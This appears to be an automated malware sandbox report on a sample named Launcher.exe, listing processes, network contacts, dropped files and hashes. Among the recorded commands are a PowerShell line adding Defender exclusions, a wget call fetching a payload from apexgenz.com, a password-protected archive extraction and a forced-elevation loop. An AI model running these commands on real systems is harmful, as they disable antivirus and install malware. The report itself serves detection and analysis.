| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
C:\Users\Admin\AppData\Roaming\services\winrar.exe
C:\Users\Admin\AppData\Roaming\services\01plugins0228.rar
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\wget.exe
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
C:\ProgramData\SystemFiles\csrss.exe
C:\Windows\system32\drivers\etc\hosts
C:\Users\Admin\AppData\Roaming\services\03plugins0228.rar
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Users\Admin\AppData\Roaming\services\WGET-H~1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:25
Platform
win10v2004-20240226-en
Max time kernel
98s
Max time network
221s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| GB | 172.217.169.74:443 | | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wy3kgglm.gyb.ps1
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
118s
Max time network
138s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
109s
Max time network
167s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1320 --field-trial-handle=2256,i,6057863739127169200,6895476048812676039,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| IE | 209.85.203.95:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 95.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tnwnvjbt.lb5.ps1
Analysis: behavioral23
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240215-en
Max time kernel
119s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
Files
C:\Users\Admin\AppData\Local\Temp\Cab254E.tmp
C:\Users\Admin\AppData\Local\Temp\Tar2570.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\Tar278D.tmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
121s
Max time network
144s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
141s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:26
Platform
win7-20240221-en
Max time kernel
255s
Max time network
277s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab7EC3.tmp
C:\Users\Admin\AppData\Local\Temp\Tar7F14.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\Tar845C.tmp
\Users\Admin\AppData\Roaming\services\Launhcer.exe
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 33728754c736b6828bf4c56c4b09b7f5 |
| SHA1 | 378e30a029be72535349aef5132134f826732777 |
| SHA256 | 6344164e001604dde050792efd3e7a4e9577fccb9ccf77e54857d8fde5565322 |
| SHA512 | c89635126f5b6838ae30545fd8363a8f370c0803d2603110d399c03f3cb0b42b8b8e7e43c4d8daafc5ad803e785dbf9659aed39b303a12641f22336e319cce2b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | cd60257de654d3640ac9bd43d9806a9c |
| SHA1 | 786950988626ef3ad88213121079e356cc475106 |
| SHA256 | 8cbb264485c41760ecd431d48e7248b3f5bdc1274483ec1ee8da83be9f16d418 |
| SHA512 | 6a89668c6b1271a0a1da4687938cd796eada2b3903a2cdbb6fd956c28aca9ac9460ad380fe41ab512494eb44b639b53108c9e82bc69cac88ce3f464997f4a437 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CABB6PJHS87B2BMEP1OW.temp
| MD5 | 2f72d08f5417da285dbcf2226d9ce666 |
| SHA1 | fa408d5d7ae829c7c35c35c2919913198682412c |
| SHA256 | 339aa4c37485691e531034f8f47ef179e995243779eaab3ceddb815d3119f129 |
| SHA512 | 294703ae63e54877b7810f63875232c89ee670c60266c07bf83c5eac12024c6f8ce8b5d8e5ce89b2d171e8fe8fa20fa4cb5b7e02a1ff00b2723006040f197bd4 |
memory/2208-390-0x0000000073290000-0x000000007383B000-memory.dmp
memory/2208-391-0x00000000028D0000-0x0000000002910000-memory.dmp
memory/2208-445-0x0000000073290000-0x000000007383B000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 24311a1d49cf6be9891bb42a8f272349 |
| SHA1 | 9e99df7f5cadc20ae4ff05e4ea8f71db2440e3ab |
| SHA256 | b6e1dce045470e50ba85a8b7b37275c2c580bb98bad1f357581c54b091668b1d |
| SHA512 | 5f3eda3a5481b1ef2ba7b2fb3dcbb7a016702378e9b4b88d9c272beb9ad619e653367b1863a079401e9ea8a6880d445f66ddb443e294d02387d8039f9f23f565 |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 2c31dcb6fd28056669a10b3d15e7f694 |
| SHA1 | 26ae1f2a2b617ed23955274500e03851d743e276 |
| SHA256 | 8a4c984cfe438ce3570121b83a07a35d23a66a32154e55ab21903927eca0d34d |
| SHA512 | 2dd33fa2da9c46e37c8fe21cd5d08334e5584e1582b9249615ab3a095229b86bba9a24a22af8d4b27ad782d31c66b7fe34514e37843285424198a28b0682cd98 |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 4dae29bf9585d883c4e6301935d7a420 |
| SHA1 | 41e92c2fdc8efa449a886d66deffac95b1dec8a2 |
| SHA256 | a9c6f5d587f85de564edebe5d06ff6b039f698a06f61c7ff9ec163cd610e3c80 |
| SHA512 | c0f2b1c2c950eec56d113c953a1d5c9d2e5a1f89f42aae044fb94198de49fcafb21f9baf7e414505ac6298e0bae132e61e9938e68d2aaceafd504012abfbc86e |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 2a66ab9a40af17dc74b5cf4d6b69f0fb |
| SHA1 | f10f8ee52e1a1ee672f061c027c853a45f4f47f4 |
| SHA256 | c28508b157f8eb5b4018534d272a432b65cd7e0365a0fa44f562e735a2d6365b |
| SHA512 | 8c9e84b41b361aaea68cf64050881a2492c1a85a31c1f18d56c40f9d13f3494af2571f94fd5048de73e77434e1397abd6ed13b219c2d97ebfce4b3fa85219c9c |
memory/2504-514-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/2504-515-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/2688-518-0x0000000002700000-0x0000000002740000-memory.dmp
memory/2504-521-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\winrar.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins0228.rar
| MD5 | 907c1e4e19a50fff3ac19087ebe04295 |
| SHA1 | 699187f7bfb7e65d05d445b46f9583c77f519c0e |
| SHA256 | 115c37d38945ee56b0e7a23cf90c60f63191aaf312c207c8ac5ab719a1500158 |
| SHA512 | 5da0d6b688c09d926881512f698ec8d205c08c37eb51f2a18471aa3f99aeb7a771030c170ea933cc67f17852a433359ce9c51fcfcff780cb6d35d78d0eb5e9c7 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
157s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8 0x470
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| NL | 52.111.243.29:443 | | tcp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hympvelh.yk0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3636-9-0x00000207664D0000-0x00000207664F2000-memory.dmp
memory/3636-10-0x00007FFA6A780000-0x00007FFA6B241000-memory.dmp
memory/3636-11-0x00000207641B0000-0x00000207641C0000-memory.dmp
memory/3636-12-0x00000207641B0000-0x00000207641C0000-memory.dmp
memory/3636-15-0x00007FFA6A780000-0x00007FFA6B241000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
117s
Max time network
128s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
Network
Files
memory/2588-5-0x000000001B660000-0x000000001B942000-memory.dmp
memory/2588-4-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/2588-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/2588-7-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-6-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2588-9-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-10-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-11-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-12-0x0000000002990000-0x0000000002A10000-memory.dmp
memory/2588-13-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
121s
Max time network
133s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
Network
Files
memory/2204-4-0x000000001B630000-0x000000001B912000-memory.dmp
memory/2204-6-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2204-7-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-5-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
memory/2204-8-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2204-9-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-10-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-11-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-12-0x0000000002DD0000-0x0000000002E50000-memory.dmp
memory/2204-13-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
129s
Max time network
174s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
157s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4c0 0x150
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_04yth2lh.33g.ps1
